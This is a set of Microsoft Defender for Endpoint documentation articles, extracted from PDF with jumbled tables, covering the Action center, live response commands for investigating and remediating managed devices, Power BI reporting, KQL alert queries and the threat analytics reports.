1. Go to the Action center (https://security.microsoft.com/action-center ) and sign
in.
2. On the History tab, select an item that has the Action type Quarantine file.
3. In the flyout pane, select Apply to X more instances of this file, and then select
Undo.
Automation levels, automated investigation

results, and resulting actions
Automation levels affect whether certain remediation actions are taken automatically or
only upon approval. Sometimes your security operations team has more steps to take,
depending on the results of an automated investigation. The following table
summarizes automation levels, results of automated investigations, and what to do in
each case.
ﾉ Expand table
Device group setting Automated investigation results What to do
Full - remediate A verdict of Malicious is reached for a Review completed actions

threats automatically piece of evidence.
(recommended)
Appropriate remediation actions are
taken automatically.
Semi - require A verdict of either Malicious or Suspicious Approve (or reject) pending
approval for any is reached for a piece of evidence. actions
remediation
Remediation actions are pending
approval to proceed.
Semi - require A verdict of Malicious is reached for a

approval for core piece of evidence. 1. Approve (or reject)
folders remediation pending actions
If the artifact is a file or executable and is 2. Review completed
in an operating system directory, such as actions
the Windows folder or the Program files
folder, then remediation actions are
pending approval.
If the artifact is not in an operating

system directory, remediation actions are
taken automatically.
Semi - require A verdict of Suspicious is reached for a Approve (or reject) pending
approval for core piece of evidence. actions.
folders remediation
approval.
Semi - require A verdict of Malicious is reached for a

approval for non- piece of evidence. 1. Approve (or reject)
temp folders pending actions
remediation If the artifact is a file or executable that is 2. Review completed
not in a temporary folder, such as the actions
user's downloads folder or temp folder,
remediation actions are pending
approval.
If the artifact is a file or executable that is

in a temporary folder, remediation
actions are taken automatically.
Semi - require A verdict of Suspicious is reached for a Approve (or reject) pending
approval for non- piece of evidence. actions
temp folders
remediation
Device group setting Automated investigation results What to do

approval.
Any of the Full or Semi A verdict of No threats found is reached View details and results of
automation levels for a piece of evidence. automated investigations
No remediation actions are taken, and no

actions are pending approval.
No automated No automated investigations run, so no Consider setting up or

response (not verdicts are reached, and no remediation changing your device
recommended) actions are taken or awaiting approval. groups to use Full or Semi
automation
All verdicts are tracked in the Action center.
７ Note
In Defender for Business, automated investigation and remediation capabilities are

preset to use Full - remediate threats automatically. These capabilities are applied
to all devices by default.
Next steps
Learn about live response capabilities
Proactively hunt for threats with advanced hunting
See also
Overview of automated investigations
 Tip
Feedback

Visit the Action center to see
remediation actions
Article • 02/21/2024
During and after an automated investigation, remediation actions for threat detections
are identified. Depending on the particular threat and how automated investigation and
remediation capabilities are configured for your organization, some remediation actions
are taken automatically, and others require approval. If you're part of your
organization's security operations team, you can view pending and completed
remediation actions in the Action center.
Applies to:

The unified Action center

Recently, the Action center was updated. You now have a unified Action center
experience. To access your Action center, go to https://security.microsoft.com/action-
center and sign in.
What's changed?
The following table compares the new, unified Action center to the previous Action
center.
ﾉ Expand table
The new, unified Action center The previous Action center
Lists pending and completed actions for Lists pending and completed actions for devices
devices and email in one location (Microsoft Defender for Endpoint only)
(Microsoft Defender for Endpoint plus
Microsoft Defender for Office 365)
Is located at: Is located at:

https://security.microsoft.com/action-center https://securitycenter.windows.com/action-center
In the Microsoft Defender portal , choose In the Microsoft Defender portal, choose
Action center. Automated investigations > Action center.


The unified Action center brings together remediation actions across Defender for
Endpoint and Defender for Office 365. It defines a common language for all remediation
actions, and provides a unified investigation experience.
You can use the unified Action center if you have appropriate permissions and one or
more of the following subscriptions:

Defender for Office 365
Defender for Business
Using the Action center

To get to the unified Action center in the improved Microsoft Defender portal:
2. In the navigation pane, select Action center.
3. Use the Pending actions and History tabs. The following table summarizes what
you'll see on each tab:
ﾉ Expand table
Tab Description
Pending Displays a list of actions that require attention. You can approve or reject actions
one at a time, or select multiple actions if they have the same type of action
(such as Quarantine file).
TIP: Make sure to review and approve (or reject) pending actions as soon as
possible so that your automated investigations can complete in a timely manner.
History Serves as an audit log for actions that were taken, such as:
Remediation actions that were taken as a result of automated
investigations
Remediation actions that were approved by your security operations team
Commands that were run and remediation actions that were applied
during Live Response sessions
Remediation actions that were taken by threat protection features in
Provides a way to undo certain actions (see Undo completed actions).
4. To customize, sort, filter, and export data in the Action center, take one or more of
the following steps:
Select a column heading to sort items in ascending or descending order.

Use the time period filter to view data for the past day, week, 30 days, or 6
months.
Choose the columns that you want to view.
Specify how many items to include on each page of data.
Use filters to view just the items you want to see.
Select Export to export results to a .csv file.
Next steps
View and approve remediation actions
See the interactive guide: Investigate and remediate threats with Microsoft
See also
 Tip
Feedback

Investigate entities on devices using live
response
Article • 05/02/2023
Applies to:

Live response gives security operations teams instantaneous access to a device (also
referred to as a machine) using a remote shell connection. This gives you the power to
do in-depth investigative work and take immediate response actions to promptly
contain identified threats in real time.
Live response is designed to enhance investigations by enabling your security

operations team to collect forensic data, run scripts, send suspicious entities for analysis,
remediate threats, and proactively hunt for emerging threats.
https://www.microsoft.com/en-us/videoplayer/embed/RE4qLUW?postJsllMsg=true
With live response, analysts can do all of the following tasks:
Run basic and advanced commands to do investigative work on a device.

Download files such as malware samples and outcomes of PowerShell scripts.
Download files in the background (new!).
Upload a PowerShell script or executable to the library and run it on a device from
a tenant level.
Take or undo remediation actions.
Before you begin

Before you can initiate a session on a device, make sure you fulfill the following
requirements:
Verify that you're running a supported version of Windows.
Devices must be running one of the following versions of Windows
Windows 10 & 11
Version 1909 or later
Version 1903 with KB4515384
Version 1809 (RS 5) with KB4537818
macOS - Minimum required version: 101.43.84. Supported for Intel-based and

ARM-based macOS devices.
Linux - Minimum required version: 101.45.13
Windows Server 2012 R2 - with KB5005292
Windows Server 2016 - with KB5005292
７ Note
For Windows Server 2012R2 or 2016 you must have the Unified Agent
installed, and it is recommended to patch to latest sensor version with
KB5005292.
Windows Server 2019

Version 1903 or (with KB4515384 ) later
Version 1809 (with KB4537818 )
Windows Server 2022
Enable live response from the advanced settings page.
You'll need to enable the live response capability in the Advanced features settings
page.
７ Note
Only admins and users who have "Manage Portal Settings" permissions can
enable live response.
Enable live response for servers from the advanced settings page
(recommended).
７ Note
Only admins and users who have "Manage Portal Settings" permissions can
enable live response.
Enable live response unsigned script execution (optional).
） Important
Signature verification only applies for PowerShell scripts.
２ Warning
Allowing the use of unsigned scripts may increase your exposure to threats.
Running unsigned scripts is not recommended as it can increase your exposure to

threats. If you must use them however, you'll need to enable the setting in the
Advanced features settings page.
Ensure that you have the appropriate permissions.
Only users who have been provisioned with the appropriate permissions can
initiate a session. For more information on role assignments, see Create and
manage roles.
） Important
The option to upload a file to the library is only available to users with
"Manage Security Settings" permission. The button is greyed out for users
with only delegated permissions.
Depending on the role that's been granted to you, you can run basic or advanced
live response commands. Users permissions are controlled by RBAC custom role.
Live response dashboard overview

When you initiate a live response session on a device, a dashboard opens. The
dashboard provides information about the session such as the following:
Who created the session

When the session started
The duration of the session
The dashboard also gives you access to:
Disconnect session
Upload files to the library
Command console
Command log
Initiate a live response session on a device
７ Note
Live response actions initiated from the Device page are not available in the
machineactions API.
1. Sign in to Microsoft Defender portal.
2. Navigate to Endpoints > Device inventory and select a device to investigate. The
devices page opens.
3. Launch the live response session by selecting Initiate live response session. A
command console is displayed. Wait while the session connects to the device.
4. Use the built-in commands to do investigative work. For more information, see
Live response commands.
5. After completing your investigation, select Disconnect session, then select

Confirm.
Live response commands

Depending on the role that's been granted to you, you can run basic or advanced live
response commands. User permissions are controlled by RBAC custom roles. For more
information on role assignments, see Create and manage roles.
７ Note
Live response is a cloud-based interactive shell, as such, specific command

experience may vary in response time depending on network quality and system
load between the end user and the target device.
Basic commands
The following commands are available for user roles that are granted the ability to run
basic live response commands. For more information on role assignments, see Create
and manage roles.
ﾉ Expand table
Command Description Windows and macOS Linux

Windows
Server
cd Changes the current directory. Y Y Y
cls Clears the console screen. Y Y Y
connect Initiates a live response session to the Y Y Y

device.
connections Shows all the active connections. Y N N
dir Shows a list of files and subdirectories in a Y Y Y

directory.
drivers Shows all drivers installed on the device. Y N N
fg <command Place the specified job in the foreground, Y Y Y

ID> making it the current job. NOTE: fg takes a
'command ID` available from jobs, not a
PID.
fileinfo Get information about a file. Y Y Y
findfile Locates files by a given name on the Y Y Y

device.
getfile Downloads a file. Y Y Y

<file_path>
help Provides help information for live response Y Y Y

commands.
jobs Shows currently running jobs, their ID and Y Y Y

status.
persistence Shows all known persistence methods on Y N N

the device.
processes Shows all processes running on the device. Y Y Y

Command Description Windows and macOS Linux
Windows
Server
registry Shows registry values. Y N N
scheduledtasks Shows all scheduled tasks on the device. Y N N
services Shows all services on the device. Y N N
startupfolders Shows all known files in startup folders on Y N N

the device.
status Shows the status and output of specific Y Y Y

command.
trace Sets the terminal's logging mode to Y Y Y

debug.
Advanced commands
The following commands are available for user roles that are granted the ability to run
advanced live response commands. For more information on role assignments, see
Create and manage roles.
ﾉ Expand table
Command Description Windows macOS Linux

and
Windows
Server
analyze Analyses the entity with various incrimination Y N N

engines to reach a verdict.
collect Collects forensics package from device. N Y Y
isolate Disconnects the device from the network while N Y N

retaining connectivity to the Defender for Endpoint
service.
release Releases a device from network isolation. N Y N
run Runs a PowerShell script from the library on the Y Y Y

device.
library Lists files that were uploaded to the live response Y Y Y

library.
Command Description Windows macOS Linux
and
Windows
Server
putfile Puts a file from the library to the device. Files are Y Y Y
saved in a working folder and are deleted when the
device restarts by default.
remediate Remediates an entity on the device. The Y Y Y

remediation action will vary depending on the
entity type: File: delete Process: stop, delete image
file Service: stop, delete image file Registry entry:
delete Scheduled task: remove Startup folder item:
delete file NOTE: This command has a prerequisite
command. You can use the -auto command in
conjunction with remediate to automatically run
the prerequisite command.
scan Runs a Quick antivirus scan to help identify and N Y Y

remediate malware.
undo Restores an entity that was remediated. Y N N
Use live response commands

The commands that you can use in the console follow similar principles as Windows
Commands.
The advanced commands offer a more robust set of actions that allow you to take more
powerful actions such as download and upload a file, run scripts on the device, and take
remediation actions on an entity.
Get a file from the device

For scenarios when you'd like get a file from a device you're investigating, you can use
the getfile command. This allows you to save the file from the device for further
investigation.
７ Note
The following file size limits apply:
getfile limit: 3 GB
fileinfo limit: 30 GB
library limit: 250 MB
Download a file in the background

To enable your security operations team to continue investigating an impacted device,
files can now be downloaded in the background.
To download a file in the background, in the live response command console, type
download <file_path> & .
If you are waiting for a file to be downloaded, you can move it to the background
by using Ctrl + Z.
To bring a file download to the foreground, in the live response command console,
type fg <command_id> .
Here are some examples:
ﾉ Expand table
Command What it does
getfile "C:\windows\some_file.exe" Starts downloading a file named some_file.exe in the

& background.
fg 1234 Returns a download with command ID 1234 to the

foreground.
Put a file in the library

Live response has a library where you can put files into. The library stores files (such as
scripts) that can be run in a live response session at the tenant level.
Live response allows PowerShell scripts to run, however you must first put the files into
the library before you can run them.
You can have a collection of PowerShell scripts that can run on devices that you initiate
live response sessions with.
To upload a file in the library

1. Click Upload file to library.
2. Click Browse and select the file.

3. Provide a brief description.
4. Specify if you'd like to overwrite a file with the same name.
5. If you'd like to be, know what parameters are needed for the script, select the
script parameters check box. In the text field, enter an example and a description.
6. Click Confirm.
7. (Optional) To verify that the file was uploaded to the library, run the library
command.
Cancel a command
Anytime during a session, you can cancel a command by pressing CTRL + C.
２ Warning
Using this shortcut will not stop the command in the agent side. It will only cancel
the command in the portal. So, changing operations such as "remediate" may
continue, while the command is canceled.
Run a script
Before you can run a PowerShell/Bash script, you must first upload it to the library.
After uploading the script to the library, use the run command to run the script.
If you plan to use an unsigned PowerShell script in the session, you'll need to enable the
setting in the Advanced features settings page.
２ Warning
Allowing the use of unsigned scripts may increase your exposure to threats.
Apply command parameters

View the console help to learn about command parameters. To learn about an
individual command, run:
PowerShell
help <command name>
When applying parameters to commands, note that parameters are handled based
on a fixed order:
PowerShell
<command name> param1 param2
When specifying parameters outside of the fixed order, specify the name of the
parameter with a hyphen before providing the value:
PowerShell
<command name> -param2_name param2
When using commands that have prerequisite commands, you can use flags:
PowerShell
<command name> -type file -id <file path> - auto
or
PowerShell
remediate file <file path> - auto`
Supported output types

Live response supports table and JSON format output types. For each command, there's
a default output behavior. You can modify the output in your preferred output format
using the following commands:
-output json
-output table
７ Note
Fewer fields are shown in table format due to the limited space. To see more details
in the output, you can use the JSON output command so that more details are
shown.
Supported output pipes

Live response supports output piping to CLI and file. CLI is the default output behavior.
You can pipe the output to a file using the following command: [command] >
[filename].txt.
Example:
Console
processes > output.txt
View the command log

Select the Command log tab to see the commands used on the device during a session.
Each command is tracked with full details such as:
ID
Command line
Duration
Status and input or output side bar
Limitations
Live response sessions are limited to 25 live response sessions at a time.
Live response session inactive timeout value is 30 minutes.
Individual live response commands have a time limit of 10 minutes, with the
exception of getfile , findfile , and run , which have a limit of 30 minutes.
A user can initiate up to 10 concurrent sessions.
A device can only be in one session at a time.
The following file size limits apply:
getfile limit: 3 GB
fileinfo limit: 30 GB
library limit: 250 MB
Related article
Live response command examples
 Tip
Feedback

Live response command examples
Article • 07/18/2023
Applies to:

Learn about common commands used in live response and see examples on how
they're typically used.
Depending on the role you have, you can run basic or advanced live response
commands. For more information on basic and advanced commands, see Investigate
entities on devices using live response.
analyze
Console
# Analyze the file malware.txt

analyze file c:\Users\user\Desktop\malware.txt
Console
# Analyze the process by PID

analyze process 1234
connections
Console
# List active connections in json format using parameter name

connections -output json
Console
# List active connections in json format without parameter name

connections json
dir
Console
# List files and sub-folders in the current folder (by default it will show
relative paths [-relative_path])
dir
Console
# List files and sub-folders in the current folder, with their full path
dir -full_path
Console
# List files and sub-folders in a specific folder

dir C:\Users\user\Desktop\
Console
# List files and subfolders in the current folder in json format

dir -output json
fileinfo
Console
# Display information about a file

fileinfo C:\Windows\notepad.exe
findfile
Console
# Find file by name

findfile test.txt
getfile
Console
# Download a file from a machine
getfile c:\Users\user\Desktop\work.txt
Console
# Download a file from a machine, automatically run prerequisite commands

getfile c:\Users\user\Desktop\work.txt -auto
７ Note
The following file types cannot be downloaded using this command from within
Live Response:
Reparse point files

Sparse files
Empty files
Virtual files, or files that are not fully present locally
These file types are supported by PowerShell.
Use PowerShell as an alternative, if you have problems using this command from
within Live Response.
library
Console
# List files in the library

library
Console
# Delete a file from the library

library delete script.ps1
processes
Console
# Show all processes
processes
Console
# Get process by pid

processes 123
Console
# Get process by pid with argument name

processes -pid 123
Console
# Get process by name

processes -name notepad.exe
putfile
Console
# Upload file from library

putfile get-process-by-name.ps1
Console
# Upload file from library, overwrite file if it exists

putfile get-process-by-name.ps1 -overwrite
Console
# Upload file from library, keep it on the machine after a restart

putfile get-process-by-name.ps1 -keep
registry
Console
# Show information about the values in a registry key

registry HKEY_CURRENT_USER\Console
Console
# Show information about a specific registry value (the double backslash \\

indicates a registry value versus key)
registry HKEY_CURRENT_USER\Console\\ScreenBufferSize
remediate
Console
# Remediate file in specific path

remediate file c:\Users\user\Desktop\malware.exe
Console
# Remediate process with specific PID

remediate process 7960
Console
# See list of all remediated entities

remediate list
run
Console
# Run PowerShell script from the library without arguments

run script.ps1
Console
# Run PowerShell script from the library with arguments

run get-process-by-name.ps1 -parameters "-processName Registry"
７ Note
For long running commands such as 'run' or 'getfile', you may want to use the '&'
symbol at the end of the command to perform that action in the background. This
will allow you to continue investigating the machine and return to the background
command when done using 'fg' basic command.
７ Note
When passing parameters to a live response script, do not include the following
forbidden characters: ';', '&', '|', '!', and '$'.
scheduledtask
Console
# Get all scheduled tasks

scheduledtasks
Console
# Get specific scheduled task by location and name

scheduledtasks Microsoft\Windows\Subscription\LicenseAcquisition
Console
# Get specific scheduled task by location and name with spacing

scheduledtasks "Microsoft\Configuration Manager\Configuration Manager Health
Evaluation"
undo
Console
# Restore remediated registry

undo registry HKEY_CURRENT_USER\Console\ScreenBufferSize
Console
# Restore remediated scheduledtask

undo scheduledtask Microsoft\Windows\Subscription\LicenseAcquisition
Console
# Restore remediated file
undo file c:\Users\user\Desktop\malware.exe
 Tip
Feedback

sensitivity labels protect and prioritize
incident response
Article • 11/15/2023
Applies to:

A typical advanced persistent threat lifecycle (or APT) involves some data exfiltration --
the point at which data is taken from the organization. In those situations, sensitivity
labels can tell security operations where to start by spelling out what data is highest
priority to protect.
Defender for Endpoint helps to make prioritization of security incidents simpler with the
use of sensitivity labels too. For example, sensitivity labels quickly identify incidents that
can involve devices with sensitive information on them (such as confidential
information).
Here's how to use sensitivity labels in Defender for Endpoint.
Investigate incidents that involve sensitive data

on devices with Defender for Endpoint
Learn how to use data sensitivity labels to prioritize incident investigation.
７ Note
Labels are detected for Windows 10, version 1809 or later, and Windows 11.
1. In Microsoft Defender portal, select Incidents & alerts > Incidents.
2. Scroll over to see the Data sensitivity column. This column reflects sensitivity labels
that are observed on devices related to the incidents providing an indication of
whether sensitive files are impacted by the incident.

You can also filter based on Data sensitivity
3. Open the incident page to further investigate.


4. Select the Devices tab to identify devices storing files with sensitivity labels.
5. Select the devices that store sensitive data and search through the timeline to
identify which files might be impacted then take appropriate action to ensure that
data is protected.
You can narrow down the events shown on the device timeline by searching for
data sensitivity labels. Doing this shows only events associated with files that the
label name.
 Tip
These data points are also exposed through the 'DeviceFileEvents' in advanced
hunting, allowing advanced queries and schedule detection to take into account
sensitivity labels and file protection status.
Related information about sensitivity labels
Learn about sensitivity labels in Office 365
Learn to apply sensitivity label inside of email or Office
Learn how to use sensitivity labels as a condition when applying Data Loss
Prevention
 Tip
Feedback

Create custom reports using Power BI
Article • 02/22/2024
Applies to:

７ Note
 Tip
In this section, you learn to create a Power BI report on top of Defender for Endpoint
APIs.
The first example demonstrates how to connect Power BI to Advanced Hunting API, and
the second example demonstrates a connection to our OData APIs, such as Machine
Actions or Alerts.
Connect Power BI to Advanced Hunting API

1. Open Microsoft Power BI.
2. Select Get Data > Blank Query.
3. Select Advanced Editor.
4. Copy the below and paste it in the editor:
let
AdvancedHuntingQuery = "DeviceEvents | where ActionType
contains 'Anti' | limit 20",
HuntingUrl =
"https://api.securitycenter.microsoft.com/api/advancedqueries",
Response = Json.Document(Web.Contents(HuntingUrl, [Query=

[key=AdvancedHuntingQuery]])),
TypeMap = #table(
{ "Type", "PowerBiType" },
{
{ "Double", Double.Type },
{ "Int64", Int64.Type },
{ "UInt64", Number.Type },
{ "Byte", Byte.Type },
{ "Single", Single.Type },
{ "Decimal", Decimal.Type },
{ "TimeSpan", Duration.Type },
{ "DateTime", DateTimeZone.Type },
{ "String", Text.Type },
{ "Boolean", Logical.Type },
{ "SByte", Logical.Type },
{ "Guid", Text.Type }
}),
Schema = Table.FromRecords(Response[Schema]),
TypedSchema = Table.Join(Table.SelectColumns(Schema, {"Name",
"Type"}), {"Type"}, TypeMap , {"Type"}),
Results = Response[Results],
Rows = Table.FromRecords(Results, Schema[Name]),
Table = Table.TransformColumnTypes(Rows,
Table.ToList(TypedSchema, (c) => {c{0}, c{2}}))
in Table
5. Select Done.
6. Select Edit Credentials.
7. Select Organizational account > Sign in.
8. Enter your credentials and wait to be signed in.

9. Select Connect.
Now the results of your query appear as a table and you can start to build visualizations
on top of it!
You can duplicate this table, rename it, and edit the Advanced Hunting query inside to
get any data you would like.
Connect Power BI to OData APIs

The only difference from the previous example is the query inside the editor. Follow
steps 1-3 above.
At step 4, instead of the code in that example, copy the following code, and paste it in
the editor to pull all Machine Actions from your organization:
let
Query = "MachineActions",
Source = OData.Feed("https://api.securitycenter.microsoft.com/api/"
& Query, null, [Implementation="2.0", MoreColumns=true])
in
Source
You can do the same for Alerts and Machines. You also can use OData queries for
queries filters. See Using OData Queries.
Power BI dashboard samples in GitHub

For more information, see the Power BI report templates .
Sample reports
View the Microsoft Defender for Endpoint Power BI report samples. For more
information, see Browse code samples.
Related articles
Defender for Endpoint APIs
Advanced Hunting API
Using OData Queries
 Tip
Feedback

Threat protection report in Microsoft
Article • 02/16/2024
Applies to:

） Important
The Microsoft Defender for Endpoint Threat Protection report page is now
deprecated and is no longer available. Microsoft recommends that you transition to
either the Defender XDR alerts or advanced hunting to understand endpoint threat
protection details. See the following sections for more information.
Use the alert queue filter in Defender XDR

Due to the deprecation of the Defender for Endpoint Threat protection report, you can
use the Defender XDR alerts view, filtered against Defender for Endpoint, to see the
current status of alerts for protected devices. For alert status, such as unresolved, you
can filter against New and In progress items. Learn more about Defender XDR Alerts.
Use Advanced hunting queries

Due to the deprecation of the Defender for Endpoint Threat protection report, you can
use Advanced hunting queries to find Defender for Endpoint threat protection
information. Currently there's no alert status in Advanced hunting elements that maps
to resolve/unresolve. Learn more about Advanced hunting in Defender XDR. See the
following section for a sample advanced hunting query that shows endpoint related
threat protection details.
Alert status
Kusto
// Severity
AlertInfo
| where Timestamp > startofday(now()) // Today
| summarize count() by Severity
| render columnchart
// Detection source
AlertInfo
| summarize count() by Severity
// Detection category
AlertInfo
| summarize count() by Category
Alert trend
Kusto
// Severity
AlertInfo
| summarize count() by DetectionSource , bin(Timestamp, 1d)
| render timechart
// Detection source
AlertInfo
| summarize count() by DetectionSource , bin(Timestamp, 1d)
| render timechart
// Detection category
AlertInfo
| summarize count() by Category , bin(Timestamp, 1d)
| render timechart
Related articles
Device health and compliance report
 Tip
Feedback

Monthly security summary report in
Article • 06/12/2023
Applies to:

The report helps organizations get a visual summary of key findings and overall
preventative actions taken to enhance the organization's overall security posture
completed in the last month. It helps you identify areas of strength and improvement,
track your progress over time, and prioritize your actions based on risk and impact.
To access this report, in the navigation pane, choose Reports > Endpoints > Monthly
Security Summary. The monthly security summary report contains the following
sections:
Microsoft Secure Score

Secure score compared to other organizations
Devices onboarded
Protection against threats
Web content monitoring and filtering
Suspicious or malicious activities
You can generate a PDF report of the summary, by selecting Generate PDF report. The
generated report is a summary of the last 30 days.
Microsoft Secure score

Microsoft Secure Score is a measurement of an organization's security posture and how
well you have implemented security best practices and recommendations across the
devices in your organization. The secure score card shows how the overall cybersecurity
strength of an organization has improved in the past month and how it compares to
other companies with similar number of managed devices.
Secure score compared to other organizations
This score is an evaluation of an organization's security score in relation to organizations
of a similar size. It's a way to benchmark an organization's performance in implementing
security measures compared to other organizations of an equivalent size.
Devices onboarded
The devices card provides information on the number of devices that were onboarded in
the last month as well as devices still not onboarded. Onboarding devices are essential
for enabling protection and detection capabilities.
Protection against threats

This card shows how effective your defenses are against common attack vectors such as
phishing and ransomware. A higher number indicates better defense in place against
phishing and ransomware. The report shows how many threats were blocked or
mitigated in the last month and how your protection level has increased.
Web content monitoring and filtering

Shows the number of malicious URLs that were blocked by Microsoft Defender for
Endpoint in the last month. The report also shows the categories of URLs that were
blocked and the number of clicks for each category.
Suspicious or malicious activities

Track how many incidents and alerts were resolved in the past month using the incidents
card. The card also shows all active incidents and alerts that require attention. You'll also
be able to see a list of the top 10 severe incidents, their status, number of alerts, and the
impacted devices and users.
 Tip
Feedback

Proactively hunt for threats with
advanced hunting in Microsoft
Defender XDR
Article • 11/15/2023
７ Note
Applies to:
Advanced hunting is a query-based threat hunting tool that lets you explore up to 30
days of raw data. You can proactively inspect events in your network to locate threat
indicators and entities. The flexible access to data enables unconstrained hunting for
both known and potential threats.
Advanced hunting supports two modes, guided and advanced. Use guided mode if you
are not yet familiar with Kusto Query Language (KQL) or prefer the convenience of a
query builder. Use advanced mode if you are comfortable using KQL to create queries
from scratch.
To start hunting, read Choose between guided and advanced modes to hunt in
https://www.microsoft.com/en-us/videoplayer/embed/RE4G6DO?postJsllMsg=true
You can use the same threat hunting queries to build custom detection rules. These
rules run automatically to check for and then respond to suspected breach activity,
misconfigured machines, and other findings.
Advanced hunting supports queries that check a broader data set coming from:

To use advanced hunting, turn on Microsoft Defender XDR.

For more information on advanced hunting in Microsoft Defender for Cloud Apps data,
see the video .
Get access
To use advanced hunting or other Microsoft Defender XDR capabilities, you need an
appropriate role in Microsoft Entra ID. Read about required roles and permissions for
advanced hunting.
Also, your access to endpoint data is determined by role-based access control (RBAC)
settings in Microsoft Defender for Endpoint. Read about managing access to Microsoft
Defender XDR.
Data freshness and update frequency

Advanced hunting data can be categorized into two distinct types, each consolidated
differently.
Event or activity data—populates tables about alerts, security events, system

events, and routine assessments. Advanced hunting receives this data almost
immediately after the sensors that collect them successfully transmit them to the
corresponding cloud services. For example, you can query event data from healthy
sensors on workstations or domain controllers almost immediately after they are
available on Microsoft Defender for Endpoint and Microsoft Defender for Identity.
Entity data—populates tables with information about users and devices. This data
comes from both relatively static data sources and dynamic sources, such as Active
Directory entries and event logs. To provide fresh data, tables are updated with any
new information every 15 minutes, adding rows that might not be fully populated.
Every 24 hours, data is consolidated to insert a record that contains the latest,
most comprehensive data set about each entity.
Time zone
Queries
Advanced hunting data uses the UTC (Universal Time Coordinated) timezone.
Queries should be created in UTC.
Results
Advanced hunting results are converted to the timezone set in Microsoft Defender XDR.
Related topics
Choose between guided and advanced hunting modes
Build hunting queries using guided mode
Learn the query language
Understand the schema
Microsoft Graph security API
Custom detections overview
 Tip
Tech Community: Microsoft Defender XDR Tech Community .
Feedback

Track and respond to emerging threats
through threat analytics
Article • 02/07/2023
Applies to:

With more sophisticated adversaries and new threats emerging frequently and
prevalently, it's critical to be able to quickly:
Assess the impact of new threats

Review your resilience against or exposure to the threats
Identify the actions you can take to stop or contain the threats
Threat analytics is a set of reports from expert Microsoft security researchers covering
the most relevant threats, including:
Active threat actors and their campaigns

Popular and new attack techniques
Critical vulnerabilities
Common attack surfaces
Prevalent malware
Each report provides a detailed analysis of a threat and extensive guidance on how to
defend against that threat. It also incorporates data from your network, indicating
whether the threat is active and if you have applicable protections in place.
Watch this short video to learn more about how threat analytics can help you track the
latest threats and stop them.
https://www.microsoft.com/en-us/videoplayer/embed/RE4bw1f?postJsllMsg=true
Required roles and permissions

The following table outlines the roles and permissions required to access Threat
Analytics. Roles defined in the table below refer to custom roles in individual portals and
are not connected to global roles in Microsoft Entra ID, even if similarly named.
ﾉ Expand table
One of the One of the following One of the following One of the
following roles roles are required for roles are required for following roles
are required for Defender for Endpoint Defender for Office 365 are required for
Microsoft Defender for
Defender XDR Cloud Apps
Threat Analytics Alerts and incidents data: Alerts and incidents data: Not available for
View data- security View-only manage Defender for
operations alerts Cloud Apps or
Manage alerts MDI users
Defender Vulnerability Organization
Management mitigations: configuration
Audit logs
View data - Threat
View-only audit logs
and vulnerability
Security reader
management
Security admin
View-only recipients
Prevented email attempts:
Security reader
Security admin
View-only recipients
View the threat analytics dashboard

The threat analytics dashboard is a great jump off point for getting to the reports that
are most relevant to your organization. It summarizes the threats in the following
sections:
Latest threats: Lists the most recently published threat reports, along with the
number of devices with active and resolved alerts.
High-impact threats: Lists the threats that have had the highest impact to the
organization. This section ranks threats by the number of devices that have active
alerts.
Threat summary: Shows the overall impact of tracked threats by showing the
number of threats with active and resolved alerts.
Select a threat from the dashboard to view the report for that threat.

View a threat analytics report

Each threat analytics report provides information in three sections: Overview, Analyst
report, and Mitigations.
Overview: Quickly understand the threat, assess its

impact, and review defenses
The Overview section provides a preview of the detailed analyst report. It also provides
charts that highlight the impact of the threat to your organization and your exposure
through misconfigured and unpatched devices.

Overview section of a threat analytics report
Assess the impact to your organization
Each report includes charts designed to provide information about the organizational
impact of a threat:
Devices with alerts: Shows the current number of distinct devices that have been
impacted by the threat. A device is categorized as Active if there is at least one
alert associated with that threat and Resolved if all alerts associated with the threat
on the device have been resolved.
Devices with alerts over time: Shows the number of distinct devices with Active
and Resolved alerts over time. The number of resolved alerts indicates how quickly
your organization responds to alerts associated with a threat. Ideally, the chart
should be showing alerts resolved within a few days.
Review security resilience and posture

Each report includes charts that provide an overview of how resilient your organization
is against a given threat:
Security configuration status: Shows the number of devices that have applied the
recommended security settings that can help mitigate the threat. Devices are
considered Secure if they have applied all the tracked settings.
Vulnerability patching status: Shows the number of devices that have applied
security updates or patches that address vulnerabilities exploited by the threat.
Analyst report: Get expert insight from Microsoft security
researchers
Go to the Analyst report section to read through the detailed expert write-up. Most
reports provide detailed descriptions of attack chains, including tactics and techniques
mapped to the MITRE ATT&CK framework, exhaustive lists of recommendations, and
powerful threat hunting guidance.
Learn more about the analyst report
Mitigations: Review list of mitigations and the status of

your devices
In the Mitigations section, review the list of specific actionable recommendations that
can help you increase your organizational resilience against the threat. The list of
tracked mitigations includes:
Security updates: Deployment of security updates or patches for vulnerabilities

Microsoft Defender Antivirus settings
Security intelligence version
Potentially unwanted application (PUA) protection
Real-time protection
Mitigation information in this section incorporates data from Microsoft Defender

Vulnerability Management, which also provides detailed drill-down information from
various links in the report.

Mitigations section of a threat analytics report
Additional report details and limitations

When using the reports, keep the following in mind:
Data is scoped based on your role-based access control (RBAC) scope. You will see
the status of devices in groups that you can access.
Charts reflect only mitigations that are tracked. Check the report overview for
additional mitigations that are not shown in the charts.
Mitigations don't guarantee complete resilience. The provided mitigations reflect
the best possible actions needed to improve resiliency.
Devices are counted as "unavailable" if they have not transmitted data to the
service.
Antivirus-related statistics are based on Microsoft Defender Antivirus settings.
Devices with third-party antivirus solutions can appear as "exposed".
Related topics
Proactively find threats with advanced hunting
Understand the analyst report section
Assess and resolve security weaknesses and exposures
 Tip
Feedback

The analyst report in threat analytics
Article • 02/07/2023
Applies to:

Each threat analytics report includes dynamic sections and a comprehensive written
section called the analyst report. To access this section, open the report about the
tracked threat and select the Analyst report tab.

Analyst report section of a threat analytics report
Scan the analyst report

Each section of the analyst report is designed to provide actionable information. While
reports vary, most reports include the sections described in the following table.
ﾉ Expand table
Report section Description
Executive Overview of the threat, including when it was first seen, its motivations,
summary notable events, major targets, and distinct tools and techniques. You can use
this information to further assess how to prioritize the threat in the context of
your industry, geographic location, and network.
Analysis Technical information about the threats, including the details of an attack and
how attackers might utilize a new technique or attack surface
MITRE ATT&CK How observed techniques map to the MITRE ATT&CK attack framework
techniques
observed
Mitigations Recommendations that can stop or help reduce the impact of the threat. This
section also includes mitigations that aren't tracked dynamically as part of the
threat analytics report.
Detection details Specific and generic detections provided by Microsoft security solutions that
can surface activity or components associated with the threat.
Advanced Advanced hunting queries for proactively identifying possible threat activity.
hunting Most queries are provided to supplement detections, especially for locating
potentially malicious components or behaviors that couldn't be dynamically
assessed to be malicious.
